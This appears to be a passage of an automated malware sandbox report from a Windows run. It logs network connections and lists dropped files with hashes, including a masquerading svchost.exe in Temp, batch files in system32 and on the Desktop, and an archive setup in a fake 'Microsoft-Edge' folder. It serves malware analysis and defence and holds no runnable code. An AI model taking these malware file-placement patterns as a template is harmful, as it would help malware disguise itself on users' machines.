| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:80 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| IE | 95.100.98.96:443 | www.bing.com | tcp |
| IE | 13.74.129.1:443 | c.msn.com | tcp |
| US | 150.171.27.10:443 | c.bing.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| IE | 23.72.36.112:443 | assets.msn.com | tcp |
| IE | 23.72.36.112:443 | assets.msn.com | tcp |
| IE | 23.72.36.112:443 | assets.msn.com | tcp |
| IE | 23.72.36.112:443 | assets.msn.com | tcp |
| IE | 23.72.36.112:443 | assets.msn.com | tcp |
| IE | 95.100.98.96:443 | www.bing.com | tcp |
| FR | 13.249.9.65:443 | sb.scorecardresearch.com | tcp |
| IE | 23.72.36.115:443 | img-s-msn-com.akamaized.net | tcp |
| IE | 23.72.36.112:443 | assets.msn.com | udp |
| IE | 23.72.36.112:443 | assets.msn.com | tcp |
| IE | 23.72.36.112:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| IE | 23.72.36.112:443 | assets.msn.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| IE | 13.74.129.1:443 | c.msn.com | tcp |
| IE | 23.72.36.112:443 | assets.msn.com | udp |
| IE | 23.72.36.112:443 | assets.msn.com | tcp |
| IE | 95.100.98.96:443 | www.bing.com | tcp |
| IE | 23.72.36.115:443 | img-s-msn-com.akamaized.net | tcp |
| IE | 23.72.36.115:443 | img-s-msn-com.akamaized.net | tcp |
| IE | 23.72.36.115:443 | img-s-msn-com.akamaized.net | tcp |
| IE | 23.72.36.115:443 | img-s-msn-com.akamaized.net | tcp |
| IE | 23.72.36.115:443 | img-s-msn-com.akamaized.net | tcp |
| IE | 23.72.36.115:443 | img-s-msn-com.akamaized.net | tcp |
| IE | 13.74.129.1:443 | c.msn.com | tcp |
| IE | 23.72.36.112:443 | assets.msn.com | tcp |
| IE | 95.100.98.96:443 | www.bing.com | udp |
| IE | 23.72.36.112:443 | assets.msn.com | tcp |
| IE | 23.72.36.112:443 | assets.msn.com | tcp |
| IE | 23.72.36.112:443 | assets.msn.com | tcp |
| IE | 13.74.129.1:443 | c.msn.com | tcp |
| IE | 95.100.98.96:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| IE | 23.72.36.112:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| US | 52.168.117.168:443 | browser.events.data.msn.com | tcp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| US | 204.79.197.203:443 | srtb.msn.com | tcp |
| US | 150.171.27.10:443 | c.bing.com | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| IE | 95.100.98.96:443 | th.bing.com | tcp |
| IE | 95.100.98.96:443 | th.bing.com | tcp |
| IE | 95.100.98.96:443 | th.bing.com | tcp |
| IE | 95.100.98.96:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| IE | 95.100.98.96:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| IE | 20.190.159.71:443 | login.microsoftonline.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 204.79.197.203:443 | srtb.msn.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 204.79.197.203:443 | srtb.msn.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| IE | 95.100.98.96:443 | th.bing.com | udp |
| IE | 23.72.36.112:443 | assets.msn.com | udp |
| IE | 95.100.98.96:443 | th.bing.com | tcp |
| IE | 23.72.36.112:443 | assets.msn.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| IE | 95.100.98.83:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| IE | 95.100.98.83:443 | www.bing.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| US | 204.79.197.203:443 | srtb.msn.com | tcp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 150.171.28.10:443 | c.bing.com | tcp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| IE | 95.100.98.96:443 | www.bing.com | tcp |
| IE | 23.72.36.121:443 | assets.msn.com | udp |
| IE | 23.72.36.121:443 | assets.msn.com | udp |
| IE | 23.72.36.121:443 | assets.msn.com | tcp |
| IE | 23.72.36.121:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| US | 204.79.197.203:443 | srtb.msn.com | tcp |
| IE | 95.100.98.96:443 | www.bing.com | tcp |
| FR | 13.249.9.34:443 | sb.scorecardresearch.com | tcp |
| IE | 23.72.36.112:443 | assets.msn.com | udp |
| IE | 95.100.98.96:443 | www.bing.com | udp |
| IE | 13.74.129.1:443 | c.msn.com | tcp |
Files
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | 0ccc31c7e5303f7c764aed3b6bfc2497 |
| SHA1 | 4871f2de6d55f15e2b033e44d04feb35e285c5d4 |
| SHA256 | 45b4a9490690a0ebca87c7293583b8ff16c61a36659c1831372476370b24280b |
| SHA512 | bbfddbc6d3543789db4ad1240b9a03e14cb3c2934b3decdf4bb77ccab66849340a31d3a11373d4f73aecefc42f4e016961f40d7bef3cc7ca34fb740b3bcbe143 |
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | 24a2cfa58d0c6106dc8f85ce4d4cb1b0 |
| SHA1 | 8a2073974e98d3fe7b179a674d7d42a003fb900d |
| SHA256 | d433e44ca87ba06b144f0a21647d3a931ab1774b98a07f26fbba9db4a4a1b677 |
| SHA512 | 28f176c37ff890ca3c0923e09704ebf9cf57f47e434d823d3561c33bc0bf0dc8156ad3313d730741fe0578b60d7d02f31285ade6200517d6e160fd5ddf679e4d |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mkde5ylu.tp4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3260-25-0x000002685CFD0000-0x000002685CFF2000-memory.dmp
C:\Windows\system32\balls.bat
| MD5 | ef7d6ce54f271156986cadcdae2c5eb1 |
| SHA1 | b680bf212b98e41dc30d84007e65ff1f090cf293 |
| SHA256 | ae67293a910698f118364e718806dc2be86085c68c3ee814579b20bd0e26c927 |
| SHA512 | 193e1d6a26d38607bdd13ef2821274cbe48a8fbf5067ea4f93ff66b791b87576dfea294ccc8dd1b85ea5c349ae08f749724606714690d5c45811dcc39c68f764 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5f4c933102a824f41e258078e34165a7 |
| SHA1 | d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee |
| SHA256 | d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2 |
| SHA512 | a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | da255d6e827f6f566661652c5f08620e |
| SHA1 | 27a36eb35d67c0ef70bf71d5be1a989641808d65 |
| SHA256 | a3b85d0066eeb4d7f0ce0c48eacbb922d6b48fd108c611f7cd05835fc0acc956 |
| SHA512 | 7aa629b4929885cf5c42bc1d280083dbd31ccac6425f6757cfce07dbbe4ad33a85fff1d4f8907505dc13f710d4308ee06d1fbc77e365b6b0392c8328b2fc99d0 |
C:\Users\Admin\AppData\Local\Temp\1945869879.bat
| MD5 | 592ea555e801f38b1bf67cb9d991ab15 |
| SHA1 | d47540e67bf8e1e47053007f0bff43e056039c1a |
| SHA256 | 38f929deeaa986df14301e9de15bed8fe14343fa0d20612adb7f92b5149e44c5 |
| SHA512 | ed9e0ab76c5a988d467825eb4dc8481622fc19c9a1ebffadae06290f7c9f81e281b54ec1f9500aedff81e6da0f1b6d852f720da1d43712b2c661b54db3b729a7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3f40d651f2dcf866a02a27bd227ca4ee |
| SHA1 | a9e6a4b46d40bd28e18e093a89a8d44b3df321d7 |
| SHA256 | 6977cb39ce8bbebd2cee5cbbb4a55aef8f424f5d7b3e461b7ecfea5c285b0a84 |
| SHA512 | 15809990ad18189c8283ce573312efb7269a464e88697e4c2f0f140d322bca0a9ee5d83dc62c6b1effe72c031682f76835029080caa6d9cf775a70e84009c57f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c7f3909baaf041fe87d52e79e8a93275 |
| SHA1 | 6ba2b9e2f4617a770a3de5f10520bd6d376845fa |
| SHA256 | ed4b0405042568c69fea8059e85ca1955f411d5e5f5c54918a796173ac0b8d9c |
| SHA512 | 5c9c58e401423685d887056bcd474c45d95897b32831e57ccaf27256860533b1c47cd557657af90e2d64a67b754cd65a10dbce400de43222851995a303e37400 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7355f4a1d4e1a2519a4a60ee11f1d192 |
| SHA1 | 8802bbb71f3e8947c02a7d835b31c7abf4289780 |
| SHA256 | 2fac16b31607552d8f35d56232cb768ddc2f393c6162d243482466527005f4e3 |
| SHA512 | 7186100f86bc7a161667583daa5419d3b75acf620892610e0fab26866a4a300795a270bb5009b7af115216569c0d854fe1e3a68121af6f734fc16f7bfaed2d33 |
C:\Users\Admin\Microsoft-Edge\Rar.exe
| MD5 | 16659ae52ce03889ad19db1f5710c6aa |
| SHA1 | 66b814fe3be64229e2cc19f0a4460e123ba74971 |
| SHA256 | 0b1866b627d8078d296e7d39583c9f856117be79c1d226b8c9378fe075369118 |
| SHA512 | f9dd360c3a230131c08c4d5f838457f690ed4094ec166acd9f141b7603f649cfa71a47ea80e9ff41b8296246bdc1c72a75288f9a836c18431e06c2e8e3fc8398 |
C:\Users\Admin\Microsoft-Edge\tmp.rar
| MD5 | d678be482106e9cb0d1df0baf98292e3 |
| SHA1 | c897f7eca06a38fb3a8cb0f05d6ad8f16f9438e2 |
| SHA256 | 72a700cd72f7662220e6154f00fe8c4194bb83e3556b490550dd746cebb02891 |
| SHA512 | f25e4855df1241245c8f5de1aa6372395508269da83a71c44f24a85e78e57b53f5b2d196526f9d868d42deaf9882a986056e901d91702dea64bfc09148e2415c |
C:\Users\Admin\Microsoft-Edge\main.bat
| MD5 | 40da2696cc3adcf1c73aa068f5a953f3 |
| SHA1 | cdfdb2f99d5c5af339af8ebc84c5dec05e5a3ac9 |
| SHA256 | c71957fc06a9c8569d9d6769a5e5c8a0a2ca0f27a6c5906a8e27898eabbe8ea4 |
| SHA512 | 6240007efc2436ebad1a5e8de494b566c64959dd89c973bf26f97b64e2be8e1d083e3835d80c68571ac3410bdb9d65cac540047e3f0c84afa263bfd0465f1cc9 |
C:\Users\Admin\AppData\Local\Temp\15623_3106930297.tmp
| MD5 | af2025c41ef1bf77c565cec9d2171608 |
| SHA1 | 4dd689ad03543c85bc22ab0a4134c3fa65779af1 |
| SHA256 | 6c709c40aba28cb272e1ad7289a6b7eeefe7e3f471cce7ea7b48a0707cba6186 |
| SHA512 | 7dd1fbaa04a58e0ff69ad363408c313b54a383e761317f031dd764002b6fb9a84981b98506b2b87f1ce120123c8dcc2b1b994f6e23dba83324855a09e3393637 |
C:\Users\Admin\AppData\Local\Temp\15623_3106930297.tmp
| MD5 | 6be01d3cb84e03bc55ee35ed0647c09a |
| SHA1 | 3d45c143f1850727a5d11d1a8b5c206523fcc024 |
| SHA256 | 4799f8aa917927dde4a26f3f434d4a57994dc30c78cc3511fac1cbab6bd24dc9 |
| SHA512 | c689ec735acdd91512f892c966e541e3bc5e713f7e2d7e7bf29d8450576a93a1b00b0dfbe0bf26217a6151e6e0f457da164d0c50e4874d5a0372a0b61a1623c9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3ec725b51b7dc5a5315cba7c430bcdab |
| SHA1 | fea1075c521710c02a66613aa052df5bb2425f52 |
| SHA256 | af3a1b94c4e6bf79ae14e27a9486837169fcfafa04d8cae03b9330771ef3b7fb |
| SHA512 | 9f7c1da86d663f3cb4309706a754f3d516f49e6a7dcef664a9712af75f7546355945b564ef4815c2f2b3d27a4121b88813bfe5a8910d10de8c192b2830462115 |
C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd
| MD5 | cf17b717a1f6b30084a58fde8614f021 |
| SHA1 | 76a9e97828f57e7e605e3eba02691a8a629ba10d |
| SHA256 | 298894785378ab2dbf591529c029c499e1f42692a6fc36075586e6f6bf6e3c8a |
| SHA512 | 4d9a49e6d886513aa85ee9e08850c7bb170c969cbf50365670b24ff7f2ec646e876cd211da9bdd36cc785439174e757270a75ab4704b568814b17a3f6c246f69 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7fce898bbf7d2713eeb746f44fe7a289 |
| SHA1 | bbb88596ebc97ddb3c83a1e0238c23110ae53586 |
| SHA256 | 0404d189236865e4d43a47c354d44c5ede1c10f4c3357d428f4af47cf9655839 |
| SHA512 | 84cd1e360e266b1ef6400c756c2035f011f9927f205fc250b758257fab9c710e7f19a288c2812eece27fa1d650d27f45617f6d8cb9cb53778c8fedca608ec4d0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
C:\Users\Admin\Desktop\CopyEnter.sql
| MD5 | ca5ba42cbefc26effb53197e55603e60 |
| SHA1 | 401330944f8badbaac54652daa6fc7a7db709c06 |
| SHA256 | f64137173f4550a8c313f2c517f0a837d3d9d78c1f795b6ef424348c9e64b5e4 |
| SHA512 | 4104f9163f6a554e695045134dac8c7e1c5fa2a3d826f8a2328f19cb9d96adc66ebbc781fa75208ad2ecb78210cc899733e031ab8bd374dc9cb9c0fee2ddbb9b |
C:\Users\Admin\Desktop\UnregisterStop.bat
| MD5 | 755fe8a38b8bf7908445e1a4c4d406a1 |
| SHA1 | 5ae56cd73e0181d0b0b28b4a698e07d491a7ccd5 |
| SHA256 | 930bde7920ebac05aa8e2a0a23fa1a8fd683502386fb1e17c1fab7c7435374f9 |
| SHA512 | 29737a7b9952ef4437d18242cb267ec5c6291e92ecad4853fb43907f9191f2213663a454ca25dac422751fada995a82be98d518a13294c58d6946b82bcd2decc |
C:\Users\Admin\Desktop\StepGrant.bat
| MD5 | c4d340ad70fd85b7838ab6a5e6db7cbd |
| SHA1 | 366646e8f8f698c6b2131aea049e9cfec0e13541 |
| SHA256 | 3372944f6e70bfa8c647c3cbdeac2769fad78b4c2f7d4a1ff3d68d7236ec6dac |
| SHA512 | e13e154b5638ead736d68babd95223eef6d43f8c84be771dcf83dc176d79469496c3a6e1fd35fc0aa31472665e60953c13d8706452f07208e8e633112a689bd7 |
C:\Users\Admin\Desktop\ResizeUnlock.bat
| MD5 | 7a621bb8da8e6388852169f15de7867e |
| SHA1 | 782983a937218dce41fac2f54acae9f81a8ee0ab |
| SHA256 | f2c107e77982085bcf38b033129e4ed4d70cb97a0b19b63e2f0f0d57369bc4e0 |
| SHA512 | bcee26e35a97037a8de4a8c185a18096ee21596f85ee6686c5ee36d8eba6a51b80d5c24372a999110c839ad63091854b7b06d1abba01224e9277ba4d96670878 |
C:\Users\Admin\Desktop\ProtectLimit.bat
| MD5 | 264bb5058d987149b63e09ebe270bc43 |
| SHA1 | ba3fc8229d4ee7e63f7f26a1b2097bcc5f25acdb |
| SHA256 | 12e83603339d5294b3a9bcd5e9eeb3ec7d9697d17082d7f904af80ed7863b0cc |
| SHA512 | 7a70f416eac405108f017dbb5376e88d37a64098ff238cb1ef5ee0b0a718b8fc5c3c974856d4456c0c26164cf572b87f6ed976b2c26948a64dfb9a3a9c40b575 |
C:\Users\Admin\Desktop\ConvertFromPing.bat
| MD5 | 1527cfd97339d0e1e3b843709258f923 |
| SHA1 | bd70b4a9a0907ec88f45746ff7bc8fa215600363 |
| SHA256 | 06d1135878d9c3a4da436ddc968d55e823913b8ab41c129bf0e1edc9fc9a4e2b |
| SHA512 | bf43006b742f479adc7589396a92ba6b91e75e46a204eb5e9f3ba6b8e4c1579fc27c7b7122571d7da32e9b502964901a1a72892ce864cb4c20bb7646999d92fd |
C:\Users\Admin\Desktop\ClearLimit.bat
| MD5 | b3a0d83a607e0697d64086284634c9b7 |
| SHA1 | 0673e875f9eb177a4a632e07789c51f8e0c8539f |
| SHA256 | 9c623463a89b0b442a02e11204459705546ff5afe71e311bd5f93769147fe9c6 |
| SHA512 | 224284c1beca5e94b27c8bade4301655a3157daa6c1ecb27b283d88d92392a782b3a73682a785965d7eb3a878b0b42de2253aff2998fe786f8f062080bdf88aa |
C:\Users\Admin\Desktop\PingShow.bat
| MD5 | d328a72be4f254bf67829056007503ae |
| SHA1 | 7042a9c537e872abefd74824720b96c65b126924 |
| SHA256 | 24d901496fb88dfd94354ae23f24a9e6c800f6a18ff1ef32bb1fb624d3f48c5e |
| SHA512 | c327615654fd8bb97bbd686fbe6798c3a3c6d9e4700041a42a76d84cadb0d4f81d8c4d75c0104b95f3b4a8b8c509e311745948bf10e803740121a0a90cb3d53f |
C:\Users\Admin\Desktop\ResizeClose.bat
| MD5 | bd678c893fd2b9c4c04a3fcb93d47466 |
| SHA1 | 515b63621c1eefb6b62f5d41eb0da7ac515c3b24 |
| SHA256 | de578000563feecc8bf65e6252d1a5079bdd5487eb9330c85e4443fbfd93a70b |
| SHA512 | 06906bf0b8443139255e42e6bad0f1523ed3dce7d79041e9c1b3f55e5a180be95ae50cd19a80076f9d96844aad9fd43269a7037ebcc68b0a06a9c5e077bb4ee8 |
\??\pipe\crashpad_2436_CYUTHVTWSFPHPHNZ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9175139d56a42d7ec0779065aa9d6756 |
| SHA1 | bb6ddd7c6406477619743e1fcc8d48c8f04d9d26 |
| SHA256 | 313552106a565d5a3c8f260e6a82ccde2606ebe464351520bfdd6cbe7ffbdfa7 |
| SHA512 | 443c934adf5e7d88a4ac10e834e94b5e86233e3ba606da10d287bb9b5c7cdf0a99aba6e3e17ec803a70e66434466fd7c510fa06a765443bd0b7e8fc308a53718 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | abed9e3e2618edc08b0b4a9bf347482b |
| SHA1 | 4b8e21f266a1b3861e89185599ab6b265e0c308b |
| SHA256 | c1db9209bc374a2f86cd95b7346b358838349df213bbf2e5a06533baaa399d8b |
| SHA512 | 11ac46f03cb60b91cc665ca07d95cef83b62e58ef3e2c0e57aad330a2f44ddffcc94b6bc031f690502171ae756869ec4b1c8cfd689529ed13915f42ea2cc1bc5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
| MD5 | 36b1322129ea1b4419763f7f1d76b4fa |
| SHA1 | d788c9fa3b8aa03bb335f9e8c47966be82e4068d |
| SHA256 | 88a87edff9238998818b1668f01022a69310733aa6677aefff7b983d71a75901 |
| SHA512 | bc4b2ebccf6e7ceea7f3511558471eb6d7f2e04d0c13dc5d9500f1b482fde17903f148316f2288ebc7f9097408da116629cc3d0062cc7282e55ded72bad73c51 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
| MD5 | 2c04530baa5cbf4da7568583cfcba840 |
| SHA1 | 568ffa48ba2d0a03d9fcd0da5f9359fcd2d22c6c |
| SHA256 | a7ab8675c37f8e44fb81c90d932affd955826acbd555c3e9833ce60106d3c2ca |
| SHA512 | 4651e75dec129a3373c0c145aedc9157813bce50f93884d18a73ad2a882f4e26f9ccce7fd16001ba530932591822c05cebf4bcf2ed8076361a3becb45e482fdb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 3224f2a32a86168c7d7c6e5579837337 |
| SHA1 | 242c6d22c34eabcf9473ae4857f953df3a7a4ee5 |
| SHA256 | 387cfa75e4bf16f5a8909491d327eab95bda1345df83e1fbdb2010a57d69e523 |
| SHA512 | c2e695cf1167aac41b45381a6dcd70501b6c8bd5e6d7b6354f77100825a19075aec0398838628c5476b93bc7340a40162a8780e05882c0f1531349c2b44bbec9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
| MD5 | 06d55006c2dec078a94558b85ae01aef |
| SHA1 | 6a9b33e794b38153f67d433b30ac2a7cf66761e6 |
| SHA256 | 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd |
| SHA512 | ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8d230f71d53003f4ec8840b0d4acefea |
| SHA1 | 9997a80afc4152fc431f8d41b10864f8e04304c1 |
| SHA256 | 933102f64fde508ed53e80c86f51cd1448950cf69bd52aa690ec155446f1ba31 |
| SHA512 | 1adba52c4c90a3ec139f3fb64de6be721a5a6527332ea2e3a8ea46f0a0eab1f0700dbb5ac9af51e691a5c841f33ceac7b299e34d4d3db3af603a874dd459a983 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 6a13c5852e352e1c418744148375243a |
| SHA1 | 95501c09829511fe5c2b1eb17f9326463777f10a |
| SHA256 | b08cbe807945ad32da4c25dbabedca76ce1424259a21eb3cf55f80c5d666d195 |
| SHA512 | 63f5a15915b40cb8833faf2cf96cd17cebdd8ac72deeee74f8bfe4b20a9c3d46df8e7a9ea5951d2a6ff8de721f3cf7380bfbbe1d0a813155798d1c47cc63e76f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | e2a8ff2cfaeed82b64e26d3c9aff0d1b |
| SHA1 | fb37fb5b0c3dafb5473e8a1c352307065afcc5d8 |
| SHA256 | 25458a7903229672e650d596dfea21400be62b3e6f8b03a2093ba038081d60de |
